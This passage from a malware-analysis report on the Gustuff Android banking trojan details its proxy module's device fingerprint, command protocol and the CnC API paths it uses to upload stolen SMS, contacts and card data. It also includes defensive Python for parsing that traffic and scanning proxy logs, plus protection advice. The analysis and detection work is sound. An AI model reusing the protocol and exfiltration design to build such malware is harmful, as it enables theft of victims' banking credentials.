    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id - device identifier; the module tries to read the value of the "id" field from the Shared Preferences file called "x". If this value cannot be obtained, it generates a new one. Thus the Proxy module has its own identifier, generated in the same way as the Bot ID.
  • imei - IMEI of the device. If an error occurs while obtaining the value, the error message is written in place of this field.
  • imsi - International Mobile Subscriber Identity of the device. If an error occurs while obtaining the value, the error message is written in place of this field.
  • model - the end-user-visible name of the end product.
  • manufacturer - the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion - a string in the format "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • country - the current locale of the device.
  • partnerId - an empty string.
  • packageName - the package name.
  • networkType - the type of the current network connection (for example "WIFI", "MOBILE"). In case of error, null is returned.
  • hasGsmSupport - true if the phone supports GSM, false otherwise.
  • simReady - SIM card state.
  • simCountry - ISO country code (based on the SIM provider).
  • networkOperator - operator name. If an error occurs while obtaining the value, the error message is written in place of this field.
  • simOperator - Service Provider Name (SPN). If an error occurs while obtaining the value, the error message is written in place of this field.
  • version - this field is stored in the config class; in the bot versions examined it equals "1.6".

5. Switches to waiting for commands from the server. Commands from the server arrive in the format:

  • offset 0 - command
  • offset 1 - sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

The following commands from the server are possible:

Name          Command   Data            Action
connectionId  0         Connection ID   Create a new connection
SLEEP         3         Time            Pause the Proxy module
PING_PONG     4         -               Send a PONG message

The PONG message is 4 bytes long and looks like this: 0x04000000.
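The command-channel layout above (a 4-byte header with command, sessionId and length, followed by data) and the registration JSON sent right after connecting are enough to recognise this traffic in a capture. The following is an added example written for this page, not code from the report or from the malware: a parser for the header, a check for the exact PONG message, and a fingerprint of the registration beacon by its field set. Two things are assumptions because the report does not state them: the length field at offset 2 is read as a 2-byte little-endian unsigned integer, and the registration JSON is carried as a UTF-8 string. The sample beacon and sample command are constructed placeholders.

```python
"""Parse and fingerprint the Gustuff Proxy module command channel.

Added example, written for this page and not code from the report or the
malware. Assumptions not stated on the page: the length field at offset 2
is a 2-byte little-endian unsigned integer, and the registration JSON
travels as a UTF-8 string.
"""
import json
import struct
from dataclasses import dataclass

# Command numbers from the report's command table.
COMMANDS = {0: "connectionId", 3: "SLEEP", 4: "PING_PONG"}

# The 16 fields of the device-registration JSON listed in the report.
REGISTRATION_FIELDS = {
    "id", "imei", "imsi", "model", "manufacturer", "androidVersion",
    "country", "partnerId", "packageName", "networkType", "hasGsmSupport",
    "simReady", "simCountry", "networkOperator", "simOperator", "version",
}

# The PONG reply the report gives as the 4 bytes 0x04000000: read with the
# header layout, that is command 4 (PING_PONG), sessionId 0, length 0.
PONG = bytes.fromhex("04000000")


@dataclass
class Header:
    command: int
    session_id: int
    length: int
    data: bytes

    @property
    def name(self) -> str:
        return COMMANDS.get(self.command, f"unknown({self.command})")


def parse_header(buf: bytes) -> Header:
    """Split one server message into command, sessionId, length and data.

    Layout from the report: offset 0 command, offset 1 sessionId,
    offset 2 length, offset 4 data. Little-endian length is an assumption.
    """
    if len(buf) < 4:
        raise ValueError("message shorter than the 4-byte header")
    command, session_id = buf[0], buf[1]
    (length,) = struct.unpack_from("<H", buf, 2)  # assumed little-endian
    data = buf[4:4 + length]
    if len(data) != length:
        raise ValueError(f"truncated message: expected {length} data bytes, got {len(data)}")
    return Header(command, session_id, length, data)


def is_pong(buf: bytes) -> bool:
    """True only for the exact 4-byte PONG message."""
    return buf == PONG


def is_registration_beacon(payload: str) -> bool:
    """Fingerprint the JSON the module sends right after connecting.

    Matches when the object carries exactly the report's field set,
    partnerId is the empty string and version is a string such as "1.6".
    """
    try:
        obj = json.loads(payload)
    except ValueError:
        return False
    if not isinstance(obj, dict) or set(obj) != REGISTRATION_FIELDS:
        return False
    return obj["partnerId"] == "" and isinstance(obj["version"], str)


# Constructed sample beacon for testing; every value is a placeholder.
SAMPLE_BEACON = json.dumps({
    "id": "c0ffee", "imei": "000000000000000", "imsi": "000000000000000",
    "model": "SamplePhone", "manufacturer": "SampleVendor",
    "androidVersion": "9 (SAMPLE-BUILD),28", "country": "US",
    "partnerId": "", "packageName": "com.example.app", "networkType": "WIFI",
    "hasGsmSupport": True, "simReady": True, "simCountry": "us",
    "networkOperator": "example", "simOperator": "example", "version": "1.6",
})

# Constructed connectionId command: command 0, sessionId 7, length 2, data "42".
SAMPLE_CONNECT = bytes.fromhex("00070200") + b"42"


if __name__ == "__main__":
    h = parse_header(SAMPLE_CONNECT)
    print(h.name, h.session_id, h.data)            # connectionId 7 b'42'
    print(parse_header(PONG).name, is_pong(PONG))  # PING_PONG True
    print(is_registration_beacon(SAMPLE_BEACON))   # True
```

Note that the PONG message is simply a header with command 4 and zero length, so the same parser handles it; if a capture shows a different endianness for the length field, only the struct format string needs changing.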

Upon receiving the connectionId command (create a new connection), CommandConnection creates an instance of the ProxyConnection class.

  • Two classes are involved in proxying: ProxyConnection and end. When a ProxyConnection object is created, it connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes the JSON object:

{
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote host with which the connection should be established. Interaction with this host takes place in the end class. Connection setup can be represented schematically as follows:

[Figure: schematic of the proxy connection setup]

Network interaction

To hinder traffic analysis by sniffers, interaction between the CnC server and the application can be protected with SSL. All data transmitted to and from the server is presented in JSON format. During operation, the application makes the following requests:

  • http://<%CnC%>/api/v1/set_state.php - the result of command execution.
  • http://<%CnC%>/api/v1/get.php - receive a command.
  • http://<%CnC%>/api/v1/load_sms.php - upload SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - upload the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - request made when values in the preferences file are updated.
  • http://<%CnC%>/api/v1/set_card.php - upload data obtained through the phishing window masquerading as Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - upload log data.
  • http://<%CnC%>/api/v1/records.php - upload data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php - notification of an error that occurred.
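The endpoint list above is the most direct network indicator the report gives, so it is worth turning into a log check. The following is an added example written for this page, not code from the report: it matches the nine API paths against a proxy log and raises a client only when it hits several distinct paths, since a lone request to a generic-looking path such as /api/v1/get.php is weak evidence on its own. The log line format ("<client_ip> <METHOD> <url> <status>") and the host names in the sample are constructed assumptions, and because the report notes the CnC traffic may be wrapped in SSL, path matching like this only works where the plaintext URL is visible (a TLS-inspecting proxy or an on-device agent); otherwise only the host or SNI can be correlated.

```python
"""Flag requests to the Gustuff CnC API paths in an HTTP proxy log.

Added example, written for this page and not code from the report. The
endpoint paths are the ones the report lists; the log line format and
the sample host names are constructed assumptions.
"""
import re
from urllib.parse import urlsplit

# Paths from the report, keyed to what the request carries.
GUSTUFF_ENDPOINTS = {
    "/api/v1/set_state.php": "command result",
    "/api/v1/get.php": "command fetch",
    "/api/v1/load_sms.php": "SMS upload",
    "/api/v1/load_ab.php": "contact list upload",
    "/api/v1/aevents.php": "preferences update",
    "/api/v1/set_card.php": "card data from fake Google Play window",
    "/api/v1/logs.php": "log upload",
    "/api/v1/records.php": "phishing window data",
    "/api/v1/set_error.php": "error report",
}

# Constructed log format "<client_ip> <METHOD> <url> <status>";
# adapt the regex to the real proxy's format.
LOG_RE = re.compile(
    r"^(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def classify_url(url: str):
    """Return the endpoint label if the URL path is a Gustuff API path, else None."""
    return GUSTUFF_ENDPOINTS.get(urlsplit(url).path)


def scan_log(lines):
    """Return (client_ip, host, path, label) for every line hitting a known path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line; a real pipeline would count these
        label = classify_url(m["url"])
        if label:
            parts = urlsplit(m["url"])
            hits.append((m["ip"], parts.hostname, parts.path, label))
    return hits


def suspicious_clients(lines, min_distinct: int = 2):
    """Clients that hit at least `min_distinct` different Gustuff paths.

    Several distinct paths from one client, especially the upload
    endpoints, is the pattern worth alerting on; a single generic hit
    is not.
    """
    per_client = {}
    for ip, _host, path, _label in scan_log(lines):
        per_client.setdefault(ip, set()).add(path)
    return {ip for ip, paths in per_client.items() if len(paths) >= min_distinct}


# Constructed sample log lines (not a real capture).
SAMPLE_LOG = [
    "10.0.0.5 GET http://cnc.example.invalid/api/v1/get.php 200",
    "10.0.0.5 POST http://cnc.example.invalid/api/v1/load_sms.php 200",
    "10.0.0.5 POST http://cnc.example.invalid/api/v1/set_card.php 200",
    "10.0.0.9 GET http://news.example.invalid/index.html 200",
    "10.0.0.9 GET http://cdn.example.invalid/api/v1/get.php 404",
    "garbage line that does not parse",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(suspicious_clients(SAMPLE_LOG))  # {'10.0.0.5'}
```

In the sample, 10.0.0.9 touches only /api/v1/get.php and is not raised at the default threshold, while 10.0.0.5 hits three distinct paths including two upload endpoints and is; the threshold is the knob to tune against the false-positive rate of the generic path names in a given environment.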

Recommendations

To protect their customers from the threat of mobile Trojans, companies should use solutions that allow them to monitor and prevent malicious activity without installing additional software on users' devices.

To achieve this, signature-based methods for detecting mobile Trojans must be reinforced with technologies that analyse the behaviour of both the customer and the application itself. Protection should also include device identification using digital fingerprinting, which makes it possible to recognise when an account is being used from an atypical device that has already fallen into the hands of a fraudster.

A key point is the availability of cross-channel analysis, which allows companies to control risks arising not only on the Internet but also in the mobile channel, for example in mobile banking applications, in cryptocurrency trading, and anywhere else financial transactions can be performed.

Security rules for users:

  • do not install applications on Android devices from sources other than Google Play, and pay close attention to the permissions an application requests;
  • install Android OS updates regularly;
  • pay attention to the file extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click links received in SMS messages.

Co-author: Semyon Rogachev, junior specialist in malware research at the Group-IB Computer Forensics Laboratory.

Source: www.hab.com
